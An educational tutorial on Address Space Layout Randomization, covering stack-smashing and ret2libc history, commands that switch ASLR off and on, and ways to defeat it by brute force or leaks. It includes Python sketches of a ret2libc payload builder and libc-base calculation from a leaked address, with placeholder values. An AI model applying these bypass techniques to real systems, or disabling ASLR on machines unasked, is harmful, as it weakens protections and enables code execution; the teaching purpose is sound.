Address Space Layout Randomization (ASLR)
A history lesson
Before we describe what ASLR is or how it's used to prevent exploitation, we need to understand why it was created.
In 1996, a hacker by the name of Aleph One published an article in
Phrack Magazine titled, "Smashing the Stack for Fun and Profit". In this
article, Aleph One describes, in great detail, how buffer overflow
vulnerabilities can be exploited to gain arbitrary code execution. These
exploitation techniques utilized a stack buffer overflow to overwrite the saved
return pointer of a function with a stack address. When the vulnerable function
executes its final ret instruction, the process jumps into the stack and
begins to execute whatever data is residing at the provided location in the
stack - the data being the attacker's shellcode. [1]
The hacker Solar Designer took this a step further by introducing the ret2libc
technique. ret2libc leverages a stack buffer overflow to gain control of a
function's saved return address; however, instead of returning into the stack,
the process returns into libc's system() function. The attacker crafts the
stack frame so that system() interprets the string '/bin/sh' as its first
argument, hijacking the process to call system('/bin/sh'). [2]
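To make the stack frame layout concrete, here is a minimal sketch of how such a payload could be laid out. It assumes a 32-bit x86 target using the cdecl calling convention, where arguments are passed on the stack. The function name, the offset of 76 bytes, and both addresses are hypothetical placeholders, not values from any real target.

```python
import struct


def build_ret2libc_payload(offset_to_ret: int, system_addr: int,
                           binsh_addr: int, fake_ret: int = 0x41414141) -> bytes:
    """Lay out a ret2libc stack frame for 32-bit x86 (cdecl, assumed).

    Layout, from lower to higher stack addresses:
      padding      fills the buffer up to the saved return address
      system_addr  overwrites the saved return address
      fake_ret     where system() would "return" to (a filler value here)
      binsh_addr   first argument as seen by system()
    """
    padding = b"A" * offset_to_ret
    # "<III" packs three little-endian unsigned 32-bit values.
    return padding + struct.pack("<III", system_addr, fake_ret, binsh_addr)


if __name__ == "__main__":
    # All three values below are hypothetical placeholders.
    payload = build_ret2libc_payload(offset_to_ret=76,
                                     system_addr=0xB7E42DA0,
                                     binsh_addr=0xB7F6382B)
    print(payload.hex())
```

The four filler bytes between the two addresses matter: when system() starts executing, it expects a return address on top of the stack and its first argument right after it.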
In order to thwart these stack buffer overflow exploitation techniques, the
PaX Team released PaX, a patch for the Linux kernel that implements the
W^X protection for memory pages and ASLR. [3] In a future section we'll cover
the concept of W^X and the non-executable stack.
So what is ASLR?
"The goal of Address Space Layout Randomization is to introduce randomness into addresses used by a given task. This will make a class of exploit techniques fail with a quantifiable probability and also allow their detection since failed attempts will most likely crash the attacked task." - The PaX Team [4]
The exploit techniques of the past relied on the memory image of the target
process being the same on every run, with minor differences due to changes in
the environment. Attackers could expect the libc system() symbol and a
'/bin/sh' string to be at static locations in memory on every attempt. ASLR
randomizes the base addresses of the heap, shared objects, and the stack when
these segments are mapped into process memory, attempting to introduce enough
entropy to prevent an attacker from successfully brute forcing their
locations. Without knowledge of the base address of libc within a target's
memory, attackers using the ret2libc technique have to guess the addresses of
the system() symbol and the '/bin/sh' string.
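One way to look at the bases that ASLR randomizes is to read a process's own memory map. The sketch below assumes a Linux system that exposes /proc/self/maps in the usual "start-end perms offset dev inode path" format; the helper name region_bases is made up for this example.

```python
import os
import re
from typing import Dict

# start-end perms offset dev inode [path]
MAPS_LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+\S+\s+\S+\s+\S+\s+\S+\s*(.*)$")
# Matches names such as libc-2.27.so or libc.so.6, but not libcrypto.so.
LIBC_PATH = re.compile(r"/libc(-[\d.]+)?\.so")


def region_bases(maps_text: str) -> Dict[str, int]:
    """Return the lowest start address seen for the heap, stack and libc."""
    bases: Dict[str, int] = {}
    for line in maps_text.splitlines():
        match = MAPS_LINE.match(line.strip())
        if not match:
            continue
        start = int(match.group(1), 16)
        path = match.group(3)
        if path in ("[heap]", "[stack]"):
            label = path.strip("[]")
        elif LIBC_PATH.search(path):
            label = "libc"
        else:
            continue
        bases[label] = min(start, bases.get(label, start))
    return bases


if __name__ == "__main__":
    if os.path.exists("/proc/self/maps"):
        with open("/proc/self/maps") as maps:
            for name, base in sorted(region_bases(maps.read()).items()):
                print(f"{name:5s} {base:#x}")
```

With ASLR enabled, running the script several times should print different bases on each run; with ASLR disabled, they should stay the same.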
ASLR in action
To see ASLR for yourself, first let's turn it off. This technique works on Ubuntu 18.04 - if it doesn't seem to work for you, try looking up how your operating system implements ASLR and how you can enable/disable it. To turn off ASLR globally for all processes, execute the following command:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Now, let's see how this affects the mappings of our processes. Run strace on
/bin/ls a couple of times and note the addresses returned by the mmap() calls
that set up the process's memory mappings. Each call to mmap() returns the same
address on every run, right? Let's re-enable ASLR on your operating system:
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
Now, run strace on /bin/ls a couple of times. You should see that the results
of the mmap() calls are no longer the same each time /bin/ls is invoked. The
memory map of our /bin/ls process is being randomized each time we execute it.
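The 0 and 2 written to randomize_va_space above are two of the three values the Linux kernel accepts for that setting. The sketch below reads the current value and describes it; the descriptions paraphrase the kernel's sysctl documentation, and the function names are made up for this example.

```python
from pathlib import Path
from typing import Optional

ASLR_SYSCTL = "/proc/sys/kernel/randomize_va_space"

MODES = {
    0: "disabled: no address space randomization",
    1: "partial: stack, mmap base and vDSO page are randomized",
    2: "full: as mode 1, plus the brk-managed heap is randomized",
}


def describe_aslr_mode(raw: str) -> str:
    """Translate the contents of randomize_va_space into a description."""
    value = int(raw.strip())
    return MODES.get(value, f"unrecognized value {value}")


def current_aslr_mode(path: str = ASLR_SYSCTL) -> Optional[str]:
    """Return a description of the running system's mode, or None if the
    sysctl file is absent (for example, on a non-Linux system)."""
    sysctl = Path(path)
    if not sysctl.exists():
        return None
    return describe_aslr_mode(sysctl.read_text())


if __name__ == "__main__":
    print(current_aslr_mode() or "randomize_va_space not available here")
```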
Breaking ASLR
Is it possible to brute force?
Well, it depends. In this paper, researchers demonstrated that, with enough
tries against the same memory mapping, attackers could brute force the
delta_mmap value described in [4].
Symbols in libc have static offsets from the library's base, and we can find
them using objdump. If we know the usual base address of libc within process
memory, we can compute the address of our target symbol and then account for
the entropy introduced by ASLR. A condition that enabled the researchers to
continuously brute force a target to determine its delta_mmap value is that
the parent process executed fork() each time a connection was made. When a
process fork()s, the child process's memory mapping is identical to the
parent's. The researchers could crash the child process as many times as
necessary to discover the delta_mmap value. Once they had it, they computed
the base address of libc within the target's memory, allowing them to compute
the location of any symbol in the target's libc to build the final payload.
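The search described above can be simulated in a few lines. This is a toy model, not the researchers' actual exploit: it assumes the randomization is a page-aligned delta added to a known usual base, and it replaces the forking server with an oracle function that answers whether a guessed address was correct. The base address, symbol offset, bit count and secret delta are all hypothetical.

```python
from typing import Callable, Optional

PAGE_SHIFT = 12  # assumes 4 KiB pages


def symbol_address(usual_base: int, delta: int, symbol_offset: int) -> int:
    """Address of a symbol when the library is shifted by `delta` pages."""
    return usual_base + (delta << PAGE_SHIFT) + symbol_offset


def make_forking_target(usual_base: int, secret_delta: int,
                        symbol_offset: int) -> Callable[[int], bool]:
    """Stand-in for a fork()ing server: every child shares one layout, so
    the oracle keeps giving consistent answers across attempts."""
    real = symbol_address(usual_base, secret_delta, symbol_offset)

    def oracle(guessed_address: int) -> bool:
        # True models "the child survived"; False models "the child crashed".
        return guessed_address == real

    return oracle


def brute_force_delta(oracle: Callable[[int], bool], usual_base: int,
                      symbol_offset: int, bits: int) -> Optional[int]:
    """Try every possible delta in order until the oracle reports success."""
    for guess in range(1 << bits):
        if oracle(symbol_address(usual_base, guess, symbol_offset)):
            return guess
    return None


if __name__ == "__main__":
    base, offset, bits = 0x40000000, 0x3ADA0, 12  # hypothetical values
    target = make_forking_target(base, secret_delta=0x2A7, symbol_offset=offset)
    found = brute_force_delta(target, base, offset, bits)
    print(hex(found), hex(symbol_address(base, found, offset)))
```

Because the layout never changes between attempts, a wrong guess is never wasted: it permanently rules out one candidate, so the loop is guaranteed to finish within 2^bits tries.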
Other methods?
Another interesting thing to think about is the amount of entropy introduced by
a system's implementation of ASLR. If the number of bits randomized within the
virtual address space of a process is small enough, even if the process doesn't
fork() like in the example above and the mapping is different on each
invocation, we could still feasibly brute force the location of libc symbols
in memory with enough guesses.
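To put rough numbers on "enough guesses", the sketch below compares the two situations under a simplified model: n randomized bits give 2^n equally likely layouts, and each attempt tests exactly one of them. The function names are made up for this example.

```python
def expected_guesses_fixed_layout(bits: int) -> float:
    """Layout stays the same across attempts (the fork() case).
    Candidates can be eliminated one by one, so on average about half
    of the 2^bits possibilities are tried: (N + 1) / 2."""
    return (2 ** bits + 1) / 2


def expected_guesses_rerandomized(bits: int) -> float:
    """Layout is re-randomized on every attempt. Each guess succeeds
    independently with probability 1 / 2^bits, so the number of guesses
    is geometrically distributed with mean 2^bits."""
    return float(2 ** bits)


def success_probability_rerandomized(bits: int, attempts: int) -> float:
    """Chance that at least one of `attempts` independent guesses hits."""
    return 1.0 - (1.0 - 2.0 ** -bits) ** attempts


if __name__ == "__main__":
    for bits in (8, 16, 28):
        print(bits,
              expected_guesses_fixed_layout(bits),
              expected_guesses_rerandomized(bits),
              round(success_probability_rerandomized(bits, 1000), 6))
```

Under this model, re-randomizing on every run only doubles the expected work compared to a fixed layout, which is why the number of randomized bits matters far more than whether the target forks.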
A common method of beating ASLR is to use some sort of sensitive information
leak, such as a format string vulnerability. [6] If an attacker can leak
information from the process to discover the location of a libc symbol in the
process's memory, the attacker can subtract that symbol's static offset to
calculate the base of libc within the process's memory, beating ASLR. [7]
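The arithmetic behind a leak is short enough to sketch. The leaked address and the symbol offsets below are hypothetical; in practice the offsets would come from inspecting the exact libc build used by the target, and the helper names are made up for this example.

```python
PAGE_SIZE = 0x1000  # assumes 4 KiB pages


def libc_base_from_leak(leaked_addr: int, leaked_symbol_offset: int) -> int:
    """Recover the libc base from one leaked symbol address."""
    base = leaked_addr - leaked_symbol_offset
    # Libraries are mapped on page boundaries, so a misaligned result
    # suggests the wrong offset or the wrong libc version was assumed.
    if base % PAGE_SIZE != 0:
        raise ValueError(f"computed base {base:#x} is not page-aligned")
    return base


def resolve(base: int, symbol_offset: int) -> int:
    """Runtime address of any other symbol once the base is known."""
    return base + symbol_offset


if __name__ == "__main__":
    # Hypothetical values for illustration only.
    PUTS_OFFSET, SYSTEM_OFFSET = 0x809C0, 0x4F440
    leaked_puts = 0x7F3C5A2809C0

    base = libc_base_from_leak(leaked_puts, PUTS_OFFSET)
    print(f"libc base {base:#x}, system() at {resolve(base, SYSTEM_OFFSET):#x}")
```

A single leaked address is enough because ASLR shifts the whole library as one unit: every symbol moves by the same amount.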